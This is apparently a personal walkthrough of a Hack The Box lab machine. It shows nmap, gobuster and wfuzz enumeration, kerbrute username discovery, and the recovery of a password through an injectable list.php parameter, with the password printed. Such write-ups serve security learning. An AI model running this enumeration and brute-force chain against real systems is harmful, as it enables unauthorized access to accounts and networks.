nmap -sV -sC -Pn 10.10.11.250  -vvv:
PORT     STATE SERVICE       REASON  VERSION
53/tcp   open  domain        syn-ack Simple DNS Plus
80/tcp   open  http          syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
88/tcp   open  kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2024-02-25 20:17:36Z)
135/tcp  open  msrpc         syn-ack Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack
464/tcp  open  kpasswd5?     syn-ack
593/tcp  open  ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack
3268/tcp open  ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack
3306/tcp open  mysql         syn-ack MySQL (unauthorized)
Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 7365/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 12932/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 9653/udp): CLEAN (Timeout)
|   Check 4 (port 62330/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2024-02-25T20:17:47
|_  start_date: N/A
|_clock-skew: 5s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 15:17
Completed NSE at 15:17, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.30 seconds

using gobuster:
    gobuster dns -d analysis.htb -w /usr/share/wordlists/subdomains-top1million-20000.txt -r analysis.htb:53 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     analysis.htb
[+] Threads:    10
[+] Resolver:   analysis.htb:53
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/subdomains-top1million-20000.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
Found: www.analysis.htb

Found: internal.analysis.htb

Found: gc._msdcs.analysis.htb

Found: domaindnszones.analysis.htb

Found: forestdnszones.analysis.htb

only internal.analysis.htb repondes with 403

used wfuzz:

wfuzz -u internal.analysis.htb/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt > wfuzz1.txt

found some directories with 301 redirect:
    "users"                                              
    "dashboard"                                          
    "employees" 

made a possible-usernames.txt:
    sudo cp /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt possible-usernames.txt
    mv possible-us.txt ~/Desktop/CTF/Tools

add @analysis.htb to each username in list:
    sed -i "s|$|@analysis.htb|" possible-usernames.txt

used kerbrute ./kerbrute_linux_amd64 userenum -d analysis.htb possible-usernames.txt --dc analysis.htb

found valid usernames:
    jdoe@analysis.htb
    ajohnson@analysis.htb
    cwilliams@analysis.htb
    wsmith@analysis.htb
    jangel@analysis.htb
    technician@analysis.htb

using gobuster i found an php file in on of the directories i found previously:
    gobuster dir -u http://internal.analysis.htb/users/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.analysis.htb/users/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/list.php             (Status: 200) [Size: 17]

when entering the page, it says missing parameter

http://internal.analysis.htb/users/list.php?<entering parameter><name=1>

we get a search result, so it means it could be exploited

i rebuilded a script https://github.com/LucasOneZ/HTB-technician-brute/blob/master/wow.go

for python

and use it, manage to discover a password:

    97NTtl*4QP96Bv

using gobuster found another php file in other directory:
    gobuster dir -u http://internal.analysis.htb/employees/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x php -t 50 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://internal.analysis.htb/employees/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 200) [Size: 1085]

so now we can use the the one of usernames that we found by kerbrute_linux_amd64 and the password we found using python script

